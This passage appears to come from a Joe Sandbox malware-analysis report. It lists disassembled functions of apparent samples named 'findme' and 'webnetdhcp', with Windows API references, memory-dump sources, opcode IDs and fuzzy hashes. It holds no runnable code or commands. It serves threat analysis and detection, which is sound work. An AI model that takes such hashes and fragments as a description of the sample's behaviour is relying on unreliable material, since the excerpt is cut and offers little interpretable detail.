                    • GetLastError.KERNEL32(?), ref: 004D0860
                      • Part of subcall function 004C6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C6EAF
                    Strings
                    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 004D0869
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                    • API String ID: 1091760877-2248577382
                    • Opcode ID: 2f717c350383995473069800d1f93340cc5db9aeb27868eec04d7392de5c2bd3
                    • Instruction ID: f026841c1582c5c52aaa7b4fc4a7fd8b1f30369fa27b410e06a260526a2777f1
                    • Opcode Fuzzy Hash: 2f717c350383995473069800d1f93340cc5db9aeb27868eec04d7392de5c2bd3
                    • Instruction Fuzzy Hash: E4D05B7550802126C6103B24AC09FBF79055F51775F61472FF239552F9DE250951D1DD
                    Function 004CDA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,004CD32F,?), ref: 004CDA53
                    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,004CD32F,?), ref: 004CDA61
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FindHandleModuleResource
                    • String ID: RTL
                    • API String ID: 3537982541-834975271
                    • Opcode ID: 139020c4e7e9aff45da81c54594c0f88d0b5c4072dd1fd852cb852dd73d7070c
                    • Instruction ID: b7f21261cb2920ffae3bf42f788d00c07993d79d5bc9641d259e8faf2ef28891
                    • Opcode Fuzzy Hash: 139020c4e7e9aff45da81c54594c0f88d0b5c4072dd1fd852cb852dd73d7070c
                    • Instruction Fuzzy Hash: F7C012716853507AD7301B206C0DF6329485B10B13F15046EB241DA1D4D9EAC941C658

                    Executed Functions

                    Function 00007FFAAC4935FE Relevance: 7.7, Strings: 6, Instructions: 236COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID: "9$b4$r6$r6$r6$r6
                    • API String ID: 0-3175317751
                    • Opcode ID: 705ea3d49bb672dacf98d545393fa5a7fa475ff55a0563a3e290959f638a08e5
                    • Instruction ID: cee7f8342352a261da364de9895ba0a3c5f5259db38d03b5db973e66de126b4b
                    • Opcode Fuzzy Hash: 705ea3d49bb672dacf98d545393fa5a7fa475ff55a0563a3e290959f638a08e5
                    • Instruction Fuzzy Hash: 4271F0B191C94D8FF794DB6CD859BACBBE1FB9A350F50827AC00EC3286DB6958018781
                    Function 00007FFAAC7841D6 Relevance: 2.6, Strings: 2, Instructions: 136COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID: (Q$(Q
                    • API String ID: 0-2438238192
                    • Opcode ID: 71788764c0d0812f150cefa5d4a5d6e0261b29bfb439189e2aa1b4cc0cdafee9
                    • Instruction ID: c2438f70aee222606dc70293924012eca8f9aaaaa70f0d63720954edbd1b6c5b
                    • Opcode Fuzzy Hash: 71788764c0d0812f150cefa5d4a5d6e0261b29bfb439189e2aa1b4cc0cdafee9
                    • Instruction Fuzzy Hash: FF415031A589598FEB88EB68D495EA973F1EF68300B148169D10FC76A5DE34EC45CBC0
                    Function 00007FFAAC49C330 Relevance: 1.7, Strings: 1, Instructions: 404COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8&
                    • API String ID: 0-3254418530
                    • Opcode ID: 04d1a665cd291afeac0db24ea12fc27fc902638b5ba4b111c75f6d1c23c041e9
                    • Instruction ID: 3e3ccc5a921d8b3dcbcc83918ceca106d54ba01e5d98cec2d5a1415401b9dd89
                    • Opcode Fuzzy Hash: 04d1a665cd291afeac0db24ea12fc27fc902638b5ba4b111c75f6d1c23c041e9
                    • Instruction Fuzzy Hash: CDD18A7090D65D8FEB95EB6888596BD7BB0FF1A304F4084BAD40DC7192DA39A948CB84
                    Function 00007FFAAC49C3A0 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8&
                    • API String ID: 0-3254418530
                    • Opcode ID: 66c3042702fd59344d5af137e518a71e3e987fb387e68f7e165eb24a4767bbe7
                    • Instruction ID: 7731204a02c0e5566f26837897aa4e3ac44c94a238d108d829460adff2b7d245
                    • Opcode Fuzzy Hash: 66c3042702fd59344d5af137e518a71e3e987fb387e68f7e165eb24a4767bbe7
                    • Instruction Fuzzy Hash: F2B18C70D0D66ECFEB54DB6488596FD7BB0FF1A314F40817AD40DD2192DA39A948CB84
                    Function 00007FFAAC49B278 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8&
                    • API String ID: 0-3254418530
                    • Opcode ID: a289404354ff866eba7c2a03f74d87a17e93b99e5a191612f73eeef79944b647
                    • Instruction ID: 455a65518bc437687f619a84e2d8e686053dee43f6a59115b21366c9192d5b83
                    • Opcode Fuzzy Hash: a289404354ff866eba7c2a03f74d87a17e93b99e5a191612f73eeef79944b647
                    • Instruction Fuzzy Hash: 89513A70D1D92E8FEB94EB6884596EDB7B1FF59304F40807AD00DD3292DE39A8458B84
                    Function 00007FFAAC49122D Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID: x
                    • API String ID: 0-2216521381
                    • Opcode ID: e9f4912d4a9139d001695290d6d860548f343f80a2e0663b7d271f2393b97b45
                    • Instruction ID: 9b5191cdddd1db78cd0eae8018cb2e27235606634e34ac0f03a567633ee51ce7
                    • Opcode Fuzzy Hash: e9f4912d4a9139d001695290d6d860548f343f80a2e0663b7d271f2393b97b45
                    • Instruction Fuzzy Hash: 9D51E170909A5A8FFB58EB78C4596F97BF0FF5A315F0085BAD00ED3191CA2AA844C781
                    Function 00007FFAAC4A5500 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID: H;
                    • API String ID: 0-3968933927
                    • Opcode ID: 58ebe952cb698d69c37e2ae7b8701f977e592ed4662eb929aa064edc0844127c
                    • Instruction ID: ab6da30db1542c7bfb9a31d1ba9576615d865286088c5d558789c102e125872e
                    • Opcode Fuzzy Hash: 58ebe952cb698d69c37e2ae7b8701f977e592ed4662eb929aa064edc0844127c
                    • Instruction Fuzzy Hash: 54513FB0D1991D8FEF94EB68C499AADBBF1FF59704F00456AD00DE3295DE34A885CB80
                    Function 00007FFAAC491240 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID: x
                    • API String ID: 0-2216521381
                    • Opcode ID: dc5a2bf7cd4eba4b5d8484862e13aef892386da6d23da6018356a033557c6ac2
                    • Instruction ID: fc26143e54936307822c969e4a3b18ba594150029efce99c63be02c790bba722
                    • Opcode Fuzzy Hash: dc5a2bf7cd4eba4b5d8484862e13aef892386da6d23da6018356a033557c6ac2
                    • Instruction Fuzzy Hash: 8B31F170909A5E8FFB58EB78C8196F97BF0FF5A315F00857AE40DD3191CA29A848C781
                    Function 00007FFAAC784602 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID: (Q
                    • API String ID: 0-937902225
                    • Opcode ID: 19c401b5b5b783c9acf0668095deb45227907387738688a50cbe319e4456097d
                    • Instruction ID: eb5889892b87e172e38bae3fb9f5cd8ce3cf0c2e489760969d5a696b1f0feeb8
                    • Opcode Fuzzy Hash: 19c401b5b5b783c9acf0668095deb45227907387738688a50cbe319e4456097d
                    • Instruction Fuzzy Hash: D3316F3165884A8FEF89EB68D059EA973E1EF69304B1441A9D10FC36A6DE28EC45C7C0
                    Function 00007FFAAC7847F1 Relevance: .4, Instructions: 391COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 046c2d94372510da94b76b9fe0b0e1d88ef953680dc99eeef271191f81e399ed
                    • Instruction ID: 87b632996916337be00f2266966eb7152dbfae8dd51b2d9a05f7969a6272bdee
                    • Opcode Fuzzy Hash: 046c2d94372510da94b76b9fe0b0e1d88ef953680dc99eeef271191f81e399ed
                    • Instruction Fuzzy Hash: A0E1D570D0962D8FEBA4EB68C855BEDB7B1FF59305F1044B9D00DE3291CA79AA84CB40
                    Function 00007FFAAC492C93 Relevance: .4, Instructions: 378COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e8a9793316921d66977a84eb9500fa05f1f499e274e81f32f48924a503d5f902
                    • Instruction ID: 9276ee1be928344e206626b48af0d576bed10b233918bc911ce0b0066d9944b7
                    • Opcode Fuzzy Hash: e8a9793316921d66977a84eb9500fa05f1f499e274e81f32f48924a503d5f902
                    • Instruction Fuzzy Hash: FBC1C13094E69A8FF751EB64C8586B97BE0EF1A305F04C5B6D40DC71A6EA3DE548C780
                    Function 00007FFAAC49B308 Relevance: .3, Instructions: 299COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 085f285df7ef76c239df35f728114bce95f4f59e7938f8339715df492312f042
                    • Instruction ID: 5fff21846ffe1e6892411f9d7f067b6950a9732c01de9e6a33f6970ac859c2fc
                    • Opcode Fuzzy Hash: 085f285df7ef76c239df35f728114bce95f4f59e7938f8339715df492312f042
                    • Instruction Fuzzy Hash: B2A19D3090D69A8FEB55EF28C8586EA7BF0FF1A304F0185BAD409C7192DB39A558C785
                    Function 00007FFAAC492135 Relevance: .3, Instructions: 298COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ab1525a7c18e2172b98100cd907be0d07347f3f11eba223399a6142a8d207b9e
                    • Instruction ID: 6c8edc016976f513012421a646f7556ad5b6aacccf92b71d5c41e7c20146376d
                    • Opcode Fuzzy Hash: ab1525a7c18e2172b98100cd907be0d07347f3f11eba223399a6142a8d207b9e
                    • Instruction Fuzzy Hash: 7791E33190E66ACFF769DB24C8596B977A0EF46304F04C2BAD00DC7192DE2EA84987C5
                    Function 00007FFAAC493360 Relevance: .3, Instructions: 281COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c7e4e1216790a146cbc02749b9166c3a93a81801c8465c88ee8c7f2348a2e94
                    • Instruction ID: 8e23c40e56b700be28dab4e1a2730e348f405d60a4be64701687e86c9e3a11ab
                    • Opcode Fuzzy Hash: 9c7e4e1216790a146cbc02749b9166c3a93a81801c8465c88ee8c7f2348a2e94
                    • Instruction Fuzzy Hash: 7D91D23094D6998FEB56EB38C85D6B97BF0FF1B314F0484BAC409C71A2DA39A548C741
                    Function 00007FFAAC49D620 Relevance: .3, Instructions: 271COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 49b8bda8a091181437d8fce3d3eb2d0ed6ab36b0100d148a24ccf8e7dea1bec8
                    • Instruction ID: 17792f44d10af91bf6d7054549358bddbfaff9387d8ba7a17b022f84a5bbfc1b
                    • Opcode Fuzzy Hash: 49b8bda8a091181437d8fce3d3eb2d0ed6ab36b0100d148a24ccf8e7dea1bec8
                    • Instruction Fuzzy Hash: 4D915E30C5EA5ACFEB55AB6488596FD7FF0EF0A304F0085BAD40DCA192DA3DA548C785
                    Function 00007FFAAC49D690 Relevance: .3, Instructions: 252COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ab0d7c4f5e73dc2d852f425daf9d2defcbc8615ea90605490f6330a6f34afd17
                    • Instruction ID: a5597d5a413ee700d3986f936fb369f3dad5d192f0f2891d9436b2e4c6e6a3fe
                    • Opcode Fuzzy Hash: ab0d7c4f5e73dc2d852f425daf9d2defcbc8615ea90605490f6330a6f34afd17
                    • Instruction Fuzzy Hash: CE815D70C5AA59CFEB51EB64C8496ED7BF0EF0A304F0085BAD40DCA192DA39A548C784
                    Function 00007FFAAC49307D Relevance: .2, Instructions: 242COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 45cce2366c2ce16e907c090b331e5a4b7a4e132e21b8b5958af3672dbd8b71b1
                    • Instruction ID: 749a1430554d8bf21bc3f72f4444fa3fa8eb13613485fd47000a3f6943ed8a4d
                    • Opcode Fuzzy Hash: 45cce2366c2ce16e907c090b331e5a4b7a4e132e21b8b5958af3672dbd8b71b1
                    • Instruction Fuzzy Hash: 5E817E70D09659CFEB51EB68C8596ED7BF0EF46304F00C5B6D40DD72A2DA39A948CB84
                    Function 00007FFAAC492A20 Relevance: .2, Instructions: 230COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 364e7bc10ade1f6409564d1b8b5529430e426a6cae08bbc316abf9542fd4a25a
                    • Instruction ID: 57b2e138cccd454c12c32763a4442dada7efb6d37421da3504393eb214add7d5
                    • Opcode Fuzzy Hash: 364e7bc10ade1f6409564d1b8b5529430e426a6cae08bbc316abf9542fd4a25a
                    • Instruction Fuzzy Hash: A0818D3094964ACFEB65EB64C8596FD7BF0EF0A314F0089BAD40DC61A2DA38A588C745
                    Function 00007FFAAC491DC2 Relevance: .2, Instructions: 217COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 688df42333e1facb010ac575f8ef0d84be5734d949a08e088655673faf472302
                    • Instruction ID: 28bfcc6035bccf6ad5df576ae5ba57ba88015057ef3aba9f45c023ee34385da5
                    • Opcode Fuzzy Hash: 688df42333e1facb010ac575f8ef0d84be5734d949a08e088655673faf472302
                    • Instruction Fuzzy Hash: 1B61B331B1CA598BEB48DF6CC8655B977E2FFD9304B14816EE44EC3286CE35E8068785
                    Function 00007FFAAC4929C0 Relevance: .2, Instructions: 214COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a31724dbf4f8ad03ca6cd97580fcaabb83fb7ff0ecf9376f7e8540e54e6545ed
                    • Instruction ID: 2c90e687444a1cd910980ce5d39150280f5cd37c90897deb88076756205def1a
                    • Opcode Fuzzy Hash: a31724dbf4f8ad03ca6cd97580fcaabb83fb7ff0ecf9376f7e8540e54e6545ed
                    • Instruction Fuzzy Hash: 4271E83194D68ACFF761AB78D8296FD7BE0EF06314F0485BBD44DC6193DA28A488C785
                    Function 00007FFAAC49CED0 Relevance: .2, Instructions: 195COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3b7a09ff0364c11873752c00c0ae30c792f2a9fa720c0f3e0716deb453c57b9e
                    • Instruction ID: 80e4e7dbf20479833c788976141dcc06df7f8b466b58410ae8210d6d4ff28db8
                    • Opcode Fuzzy Hash: 3b7a09ff0364c11873752c00c0ae30c792f2a9fa720c0f3e0716deb453c57b9e
                    • Instruction Fuzzy Hash: 22614930D19A6DCFEB54EB68C4486FDBBF0EF1A304F00847AD40DDB192DA39A5488B84
                    Function 00007FFAAC49CCC8 Relevance: .2, Instructions: 179COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2d7d4286b0f813691be819d769b77bf5c662dee7b722ffdb4f030147b3ec3742
                    • Instruction ID: 5f0b88fd53770b7810f07d14949295c23b80b24066331cd563ba338ad1b90a39
                    • Opcode Fuzzy Hash: 2d7d4286b0f813691be819d769b77bf5c662dee7b722ffdb4f030147b3ec3742
                    • Instruction Fuzzy Hash: 9551817081EA9E8FEB559B6488182FD7FE0FF06305F0085BAD80DC6192DB39A558C781
                    Function 00007FFAAC491B65 Relevance: .1, Instructions: 148COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d34d2a03c8b96a647423de97896b45df0b4f7bf4b1d5c09fcf97d842246b58df
                    • Instruction ID: 2e7c85f2c1975c6c83e9ef190739a30e2ef08283809e77d48081fa0b8cb84bf3
                    • Opcode Fuzzy Hash: d34d2a03c8b96a647423de97896b45df0b4f7bf4b1d5c09fcf97d842246b58df
                    • Instruction Fuzzy Hash: 7141E33184E78A8FFB559B3488195FA3FE0FF47305F4485BEE809C61A2EA29D558C781
                    Function 00007FFAAC492DF9 Relevance: .1, Instructions: 148COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9c23157bd2c1c58348644db467e90cf08e41a3079bcb1837bcea4c383673b96e
                    • Instruction ID: 54109da214d19e0ef08f31657a9969f01ff408ec6064ea5fc38e1db3b9bf3321
                    • Opcode Fuzzy Hash: 9c23157bd2c1c58348644db467e90cf08e41a3079bcb1837bcea4c383673b96e
                    • Instruction Fuzzy Hash: 0D51923084E69A8FF7629B7488596FA7BA0EF07309F04C5B6D40DC60D6EA7DE548C781
                    Function 00007FFAAC49CED8 Relevance: .1, Instructions: 139COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f7e2381cba7d8a23a9ce6a07624c1de63fd4da07f05e39b40df51714894e9c4a
                    • Instruction ID: 3a1884c51043e731a2f73f3c220be6194bd897c333192d4d5e8826f1730e6c17
                    • Opcode Fuzzy Hash: f7e2381cba7d8a23a9ce6a07624c1de63fd4da07f05e39b40df51714894e9c4a
                    • Instruction Fuzzy Hash: DE511C70D19A6ECFEB54DF54C4486FDBBF0EF19315F00857AD40DE6281DA39A9488B84
                    Function 00007FFAAC4905F0 Relevance: .1, Instructions: 118COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 56f45c4f74aa18a1387db42c350f54f7371bedc44e5dce462713d710375a745c
                    • Instruction ID: 2cccde9031823444ee31205f8208f5abd6b267b1bd7f2f1a96f8e3b48d54a720
                    • Opcode Fuzzy Hash: 56f45c4f74aa18a1387db42c350f54f7371bedc44e5dce462713d710375a745c
                    • Instruction Fuzzy Hash: DF31823484964E8FFB55DB3488595BA3BA0FF46305F40C5BED40ED2191DA3AE558C781
                    Function 00007FFAAC49267D Relevance: .1, Instructions: 111COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b48005771f25204924d99e31e65e6fc137e45cd289c67e8e7f48c363cdf4576c
                    • Instruction ID: aaea9d37d076a988dbdd372e376648b82135d715bb2b6331d50f8fd23ed3995c
                    • Opcode Fuzzy Hash: b48005771f25204924d99e31e65e6fc137e45cd289c67e8e7f48c363cdf4576c
                    • Instruction Fuzzy Hash: E931B13084E79A8FE766DB3488585A63FB0FF06304F05C5FAD409C6092EA29E558C781
                    Function 00007FFAAC490500 Relevance: .1, Instructions: 109COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1479791486.00007FFAAC490000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC490000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac490000_webnetdhcp.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cff73b3fe321f00dee84a5706f6d0ef3b1f65444c214ef48edb7ccccb6d7b7d6
                    • Instruction ID: c24f5e86a8228e8ffc88bc2e67600af744feeb95ce1530a6a28b9418bc082861
                    • Opcode Fuzzy Hash: cff73b3fe321f00dee84a5706f6d0ef3b1f65444c214ef48edb7ccccb6d7b7d6
                    • Instruction Fuzzy Hash: 4341A03085D68E8FE755EB34C8586AA3BF0FF16304F04C9BAD40DC61A2EA39E558C741
                    Function 00007FFAAC783FAD Relevance: .1, Instructions: 108COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000A.00000002.1488708038.00007FFAAC780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC780000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ffaac780000_webnetdhcp.jbxd
                    Similarity
